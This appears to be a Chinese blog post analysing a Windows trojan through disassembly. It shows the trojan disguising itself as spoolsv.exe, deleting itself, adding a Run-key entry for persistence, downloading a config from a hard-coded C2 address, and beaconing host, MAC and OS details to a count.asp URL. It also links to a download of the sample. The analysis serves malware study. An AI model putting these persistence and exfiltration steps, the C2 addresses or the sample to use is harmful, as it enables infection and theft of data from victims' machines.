标签:
附件地址
http://yunpan.cn/cweSZX8T4k9Tz 访问密码 a865
先跑跑流程:
发先会创建一个spoolsc.exe,并且创建该进程以及修改注册表,访问网络操作,以及删除自身
木马分析:
通过GetModuleFileNameA()函数获取当前被加载文件路径(即木马的路径)
1: 00402466 56 push esi
2: 00402467 57 push edi
3: 00402468 68 04010000 push 0x104
4: 0040246D 68 844C4000 push 1.00404C84
5: 00402472 6A 00 push 0x0
6: 00402474 FF15 34304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; kernel32.GetModuleFileNameA
通过GetSystemDirectoryA()函数获取系统路径,
1: 00402480 68 04010000 push 0x104
2: 00402485 68 804B4000 push 1.00404B80 ; ASCII "C:\WINDOWS\system32"
3: 0040248A FFD6 call esi ;GetSystemDirectoryA
1: 004024D6 BF 8A4D4000 mov edi,1.00404D8A ; ASCII "\WINDOWS\system\spoolsv.exe"
2: 004024DB C1E9 02 shr ecx,0x2
3: 004024DE F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
4: 004024E0 8BCA mov ecx,edx
5: 004024E2 83E1 03 and ecx,0x3
6: 004024E5 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
7: 004024E7 FF15 74304000 call dword ptr ds:[<&KERNEL32.GetFileAtt>; kernel32.GetFileAttributesA
8:
通过CopyFileA()函数,将木马重命名为spoolsv.exe复制到系统文件夹下(spoolsv是系统文件,这里伪装成系统程序是为了不容易被辨认)
1: 00402509 6A 00 push 0x0
2: 0040250B 68 884D4000 push 1.00404D88 ; ASCII "C:\WINDOWS\system\spoolsv.exe"
3: 00402510 68 844C4000 push 1.00404C84 ; C:\Documents and Settings\Administror\Desktop\1.exe
4: 00402515 FFD0 call eax ; kernel32.CopyFileA
然后睡眠一会儿,接着使用WinExec()函数运行spoolsv.exe
1: 00402517 68 F4010000 push 0x1F4
2: 0040251C FF15 64304000 call dword ptr ds:[<&KERNEL32.Sleep>] ; kernel32.Sleep
3: 00402522 6A 05 push 0x5
4: 00402524 68 884D4000 push 1.00404D88 ; ASCII "C:\WINDOWS\system\spoolsv.exe"
5: 00402529 FF15 18304000 call dword ptr ds:[<&KERNEL32.WinExec>] ; kernel32.WinExec
通过字符串拼接方式,拼接出一个用cmd命令删除正在运行的木马本身 得到的字符串:
C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ ADMINI~1\桌面\CSB-云~1\1.exe > nul.
1: 00401525 50 push eax
2: 00401526 53 push ebx
3: 00401527 FF15 34304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; kernel32.GetModuleFileNameA
4: 0040152D 85C0 test eax,eax
5: 0040152F 0F84 45010000 je 1.0040167A
6: 00401535 8D4C24 64 lea ecx,dword ptr ss:[esp+0x64]
7: 00401539 68 04010000 push 0x104
8: 0040153E 8D5424 68 lea edx,dword ptr ss:[esp+0x68]
9: 00401542 51 push ecx
10: 00401543 52 push edx
11: 00401544 FF15 60304000 call dword ptr ds:[<&KERNEL32.GetShortPa>; kernel32.GetShortPathNameA
12: 0040154A 85C0 test eax,eax
13: 0040154C 0F84 28010000 je 1.0040167A
14: 00401552 8D8424 6C020000 lea eax,dword ptr ss:[esp+0x26C]
15: 00401559 68 04010000 push 0x104
16: 0040155E 50 push eax
17: 0040155F 68 20494000 push 1.00404920 ; ASCII "COMSPEC"
18: 00401564 FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetEnviron>; kernel32.GetEnvironmentVariableA
19: 0040156A 85C0 test eax,eax
20: 0040156C 0F84 08010000 je 1.0040167A
21: 00401572 8D8C24 68010000 lea ecx,dword ptr ss:[esp+0x168]
22: 00401579 68 14494000 push 1.00404914 ; ASCII " /c del "
23: 0040157E 51 push ecx
24: 0040157F FF15 28304000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; kernel32.lstrcpyA
25: 00401585 8B35 24304000 mov esi,dword ptr ds:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
26: 0040158B 8D5424 64 lea edx,dword ptr ss:[esp+0x64]
27: 0040158F 8D8424 68010000 lea eax,dword ptr ss:[esp+0x168]
28: 00401596 52 push edx
29: 00401597 50 push eax
30: 00401598 FFD6 call esi
31: 0040159A 8D8C24 68010000 lea ecx,dword ptr ss:[esp+0x168]
32: 004015A1 68 0C494000 push 1.0040490C ; ASCII " > nul"
33: 004015A6 51 push ecx
34: 004015A7 FFD6 call esi
通过CreateProcessA()函数,使cmd运行刚刚拼接得到的字符串
修改注册表
1: 00401695 50 push eax
2: 00401696 68 06000200 push 0x20006
3: 0040169B 6A 00 push 0x0
4: 0040169D 68 34494000 push 1.00404934 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
5: 004016A2 68 02000080 push 0x80000002
6: 004016A7 FF15 04304000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; advapi32.RegOpenKeyExA
7: 004016AD 85C0 test eax,eax
8: 004016AF 75 1D jnz X1.004016CE
9: 004016B1 8B4C24 00 mov ecx,dword ptr ss:[esp]
10: 004016B5 68 04010000 push 0x104
11: 004016BA 68 884D4000 push 1.00404D88 ; ASCII "C:\WINDOWS\system\spoolsv.exe"
12: 004016BF 6A 01 push 0x1
13: 004016C1 50 push eax
14: 004016C2 68 28494000 push 1.00404928 ; ASCII "System32"
15: 004016C7 51 push ecx
16: 004016C8 FF15 08304000 call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA
17: 004016CE 8B5424 00 mov edx,dword ptr ss:[esp]
18: 004016D2 52 push edx
19: 004016D3 FF15 00304000 call dword ptr ds:[<&ADVAPI32.RegCloseKe>; advapi32.RegCloseKey
20: 004016D9 59 pop ecx
21: 004016DA C3 retn
通过下面的算法解密字符串,得到
堆栈地址=0012FB20, (ASCII "http://121.12.115.10:123/ay/od.txt")
获得URLDwonloadToFileA()函数,去下载这个文档
1: 004014A0 56 push esi
2: 004014A1 68 F4484000 push 1.004048F4 ; ASCII "URLDownloadToFileA"
3: 004014A6 68 E8484000 push 1.004048E8 ; ASCII "urlmon.dll"
4: 004014AB FF15 10304000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryA
5: 004014B1 50 push eax
6: 004014B2 FF15 14304000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; kernel32.GetProcAddress
下载函数调用
1: 004014C9 6A 00 push 0x0
2: 004014CB 6A 00 push 0x0
3: 004014CD 57 push edi
4: 004014CE 53 push ebx ;
5: 004014CF 6A 00 push 0x0
6: 004014D1 FFD6 call esi ; urlmon.URLDownloadToFileA
堆栈中的参数
1: 0012F7B8 00000000
2: 0012F7BC 0012FB28 ASCII "http://121.12.115.10:123/ay/od.txt"
3: 0012F7C0 00404B80 ASCII "C:\WINDOWS\system\fuck.ini"
4: 0012F7C4 00000000
5: 0012F7C8 00000000
因为该地址已经被和谐了,所以这里就没办法下载到这个fuck.ini文件,抓包抓不出来任何东西,而且ping也ping不通。
这里会打开fuck.ini文件,读取里面的内容
1: 004027F6 push offset aCWindowsSystem ; lpFileName
2: 004027FB push 80h ; nSize
3: 00402800 push eax ; lpReturnedString
4: 00402801 push offset Default ; lpDefault
5: UPX0:00402806 push offset KeyName ; "jc"
6: 0040280B push ecx ; lpAppName
7: 0040280C call ebp ; GetPrivateProfileStringA
8: 0040280E push offset aCWindowsSystem ; lpFileName
9: 00402813 lea edx, [esp+744h+var_704]
10: 00402817 mov eax, [esp+744h+lpAppName]
11: UPX0:0040281B push 80h ; nSize
12: UPX0:00402820 push edx ; lpReturnedString
13: UPX0:00402821 push offset Default ; lpDefault
14: UPX0:00402826 push offset aMz ; "mz"
15: UPX0:0040282B push eax ; lpAppName
16: UPX0:0040282C call ebp ; GetPrivateProfileStringA
17: UPX0:0040282E mov edx, [esp+740h+lpAppName]
18: UPX0:00402832 push offset aCWindowsSystem ; lpFileName
19: UPX0:00402837 lea ecx, [esp+744h+var_584]
20: UPX0:0040283E push 80h ; nSize
21: UPX0:00402843 push ecx ; lpReturnedString
22: UPX0:00402844 push offset Default ; lpDefault
23: UPX0:00402849 push offset aYs ; "ys"
24: UPX0:0040284E push edx ; lpAppName
25: UPX0:0040284F call ebp ; GetPrivateProfileStringA
26: UPX0:00402851 push offset aCWindowsSystem ; lpFileName
27: UPX0:00402856 lea eax, [esp+744h+var_684]
28: 0040285D mov ecx, [esp+744h+lpAppName]
29: 00402861 push 80h ; nSize
30: 00402866 push eax ; lpReturnedString
31: 00402867 push offset Default ; lpDefault
32: 0040286C push offset aUrl ; "url"
33: 00402871 push ecx ; lpAppName
34: 00402872 call ebp ; GetPrivateProfileStringA
通过gethostbyname()函数,获取本机的主机名和地址信息
1: 00401BE3 68 04010000 push 0x104
2: 00401BE8 50 push eax
3: 00401BE9 FF15 78314000 call dword ptr ds:[<&WS2_32.#57>] ; WS2_32.gethostname
还有操作系统信息以及mac地址信息等
1: 00401C28 /75 2D jnz X1.00401C57
2: 00401C2A |BF 84494000 mov edi,1.00404984 ; ASCII "unknow os"
3: 00401C2F |83C9 FF or ecx,0xFFFFFFFF
4: 00401C32 |33C0 xor eax,eax
5: 00401C34 |F2:AE repne scas byte ptr es:[edi]
6: 00401C36 |F7D1 not ecx
7: 00401C38 |2BF9 sub edi,ecx
8: 00401C3A |8BF7 mov esi,edi
9: 00401C3C |8BD1 mov edx,ecx
10: 00401C3E |BF 904F4000 mov edi,1.00404F90 ; ASCII "Windows XP"
11: 00401C43 |83C9 FF or ecx,0xFFFFFFFF
12: 00401C46 |F2:AE repne scas byte ptr es:[edi]
13: 00401C48 |8BCA mov ecx,edx
14: 00401C4A |4F dec edi
15: 00401C4B |C1E9 02 shr ecx,0x2
16: 00401C4E |F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
17: 00401C50 |8BCA mov ecx,edx
18: 00401C52 |83E1 03 and ecx,0x3
19: 00401C55 |F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
20: 00401C57 \55 push ebp
21: 00401C58 68 8C4E4000 push 1.00404E8C
22: 00401C5D E8 7EFAFFFF call 1.004016E0
23: 00401C62 83C9 FF or ecx,0xFFFFFFFF
24: 00401C65 BF A04A4000 mov edi,1.00404AA0 ; ASCII "?mac="
通过字符串拼接的方式,得到下面的字符串
这里的哈数
1: 00401F14 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
2: 00401F16 FF15 74314000 call dword ptr ds:[<&WS2_32.#116>] ; WS2_32.WSACleanup
3: 00401F1C 8B35 10304000 mov esi,dword ptr ds:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
4: 00401F22 68 484A4000 push 1.00404A48 ; ASCII "InternetOpenA"
5: 00401F27 68 3C4A4000 push 1.00404A3C ; ASCII "wininet.dll"
6: 00401F2C FFD6 call esi
7: 00401F2E 8B3D 14304000 mov edi,dword ptr ds:[<&KERNEL32.GetProc>; kernel32.GetProcAddress
8: 00401F34 50 push eax
9: 00401F35 FFD7 call edi
10: 00401F37 68 284A4000 push 1.00404A28 ; ASCII "InternetOpenUrlA"
11: 00401F3C 68 3C4A4000 push 1.00404A3C ; ASCII "wininet.dll"
12: 00401F41 8BE8 mov ebp,eax
13: 00401F43 FFD6 call esi
14: 00401F45 50 push eax
15: 00401F46 FFD7 call edi
16: 00401F48 68 144A4000 push 1.00404A14 ; ASCII "InternetCloseHandle"
17: 00401F4D 68 3C4A4000 push 1.00404A3C ; ASCII "wininet.dll"
18: 00401F52 8BD8 mov ebx,eax
19: 00401F54 FFD6 call esi
20: 00401F56 50 push eax
21: 00401F57 FFD7 call edi
22: 00401F59 6A 00 push 0x0
23: 00401F5B 6A 00 push 0x0
24: 00401F5D 6A 00 push 0x0
25: 00401F5F 6A 00 push 0x0
26: 00401F61 68 0C4A4000 push 1.00404A0C ; ASCII "GOOGLE"
27: 00401F66 8BF8 mov edi,eax
28: 00401F68 FFD5 call ebp
打开刚才拼接成的字符串 的地址
1: 00401F7D 6A 00 push 0x0
2: 00401F7F 68 00000080 push 0x80000000
3: 00401F84 6A 00 push 0x0
4: 00401F86 6A 00 push 0x0
5: 00401F88 68 34414000 push 1.00404134 ; ASCII "http://121.12.115.10:1111/count.asp?mac=000C2931A180&ver=20120919&makedate=&userID=ceo&ComPut=11111-bc7cb7307&os=Windows XP&key=nb20548ccccccccccccccccccccccccc&explorer="
6: 00401F8D 56 push esi
7: 00401F8E FFD3 call ebx ; WININET.InternetOpenUrlA
接下来就是找到缓存地址,删除缓存中的内容
1: 0040217E 50 push eax
2: 0040217F 56 push esi
3: 00402180 57 push edi
4: 00402181 FF15 60314000 call dword ptr ds:[<&WININET.FindFirstUr>; WININET.FindFirstUrlCacheEntryA
5: 00402187 8BF8 mov edi,eax
6: 00402189 33C0 xor eax,eax
7: 0040218B 85FF test edi,edi
8: 0040218D 0F95C0 setne al
9: 00402190 EB 0D jmp X1.0040219F
10: 00402192 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
11: 00402196 51 push ecx
12: 00402197 56 push esi
13: 00402198 57 push edi
14: 00402199 FF15 6C314000 call dword ptr ds:[<&WININET.FindNextUrl>; WININET.FindNextUrlCacheEntryA
15: 0040219F 85C0 test eax,eax
16: 004021A1 74 30 je X1.004021D3
17: 004021A3 33DB xor ebx,ebx
18: 004021A5 EB 38 jmp X1.004021DF
19: 004021A7 F746 0C 0000100>test dword ptr ds:[esi+0xC],0x100000
20: 004021AE 75 0A jnz X1.004021BA
21: 004021B0 8B56 04 mov edx,dword ptr ds:[esi+0x4]
22: 004021B3 52 push edx
23: 004021B4 FF15 68314000 call dword ptr ds:[<&WININET.DeleteUrlCa>; WININET.DeleteUrlCacheEntryA
24: 004021BA 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
25: 004021BE 896C24 10 mov dword ptr ss:[esp+0x10],ebp
26: 004021C2 50 push eax
27: 004021C3 56 push esi
28: 004021C4 57 push edi
29: 004021C5 FF15 6C314000 call dword ptr ds:[<&WININET.FindNextUrl>; WININET.FindNextUrlCacheEntryA
30: 004021CB 85C0 test eax,eax
31: 004021CD 74 04 je X1.004021D3
32: 004021CF 33DB xor ebx,ebx
33: 004021D1 EB 0C jmp X1.004021DF
34: 004021D3 FF15 4C304000 call dword ptr ds:[<&KERNEL32.GetLastErr>; ntdll.RtlGetLastWin32Error
35: 004021D9 8B6C24 10 mov ebp,dword ptr ss:[esp+0x10]
36: 004021DD 8BD8 mov ebx,eax
37: 004021DF 8B4424 14 mov eax,dword ptr ss:[esp+0x14]
38: 004021E3 85C0 test eax,eax
39: 004021E5 ^ 0F84 5EFFFFFF je 1.00402149
40: 004021EB 56 push esi
41: 004021EC E8 8F0A0000 call <jmp.&MFC42.#825>
42: 004021F1 83C4 04 add esp,0x4
43: 004021F4 85FF test edi,edi
44: 004021F6 74 07 je X1.004021FF
45: 004021F8 57 push edi
46: 004021F9 FF15 64314000 call dword ptr ds:[<&WININET.FindCloseUr>; WININET.FindCloseUrlCache
1: 00402B99 68 804B4000 push 1.00404B80 ; ASCII "C:\WINDOWS\system\fuck.ini"
2: 00402B9E FF15 54304000 call dword ptr ds:[<&KERNEL32.DeleteFile>; kernel32.DeleteFileA
标签:
原文地址:http://www.cnblogs.com/kangxiaopao/p/4554577.html
